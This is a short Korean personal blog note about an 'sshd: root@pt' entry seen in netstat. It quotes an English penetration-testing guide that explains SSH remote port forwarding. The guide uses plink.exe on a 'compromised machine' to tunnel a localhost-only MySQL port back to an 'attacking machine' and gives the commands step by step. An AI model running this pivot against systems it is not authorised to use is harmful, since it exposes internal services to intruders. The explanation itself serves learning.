netstat에서 다음과 같은 신기한게 있어서 검색

sshd: root@pt 

아무튼.. 원격에서 ssh를 통해서 포트포워딩 해서 쓸 수 있도록 하는거 같은데..

한개의 포트라면 이게 더 깔끔 하려나?

Remote port forwarding

Remote port forwarding is crazy, yet very simple concept. So imagine that you have compromised a machine, and that machine has like MYSQL running but it is only accessible for localhost. And you can't access it because you have a really crappy shell. So what we can do is just forward that port to our attacking machine. The steps are as following:

Here is how you create a remote port forwarding:

ssh <gateway> -R <remote port to bind>:<local host>:<local port>

By the way, plink is a ssh-client for windows that can be run from the terminal. The ip of the attacking machine is

Step 1 So on our compromised machine we do:

plink.exe -l root -pw mysecretpassword -R 3307:

Step 2 Now we can check netstat on our attacking machine, we should see something like this:

tcp        0      0*               LISTEN      19392/sshd: root@pt

That means what we can connect to that port on the attacking machine from the attacking machine.

Step 3 Connect using the following command:

mysql -u root -p -h --port=3307 

[링크 :]

'프로그램 사용 > ssh scp sftp' 카테고리의 다른 글

ssh blowfish  (0) 2019.09.24
ssh tunnel proxy  (0) 2019.09.20
ssh remote port forwarding  (0) 2019.01.28
reverse SSH  (0) 2018.05.14
rpi vpn client  (0) 2018.05.11
scp: ambiguous target 에러  (0) 2016.09.21
Posted by 구차니

댓글을 달아 주세요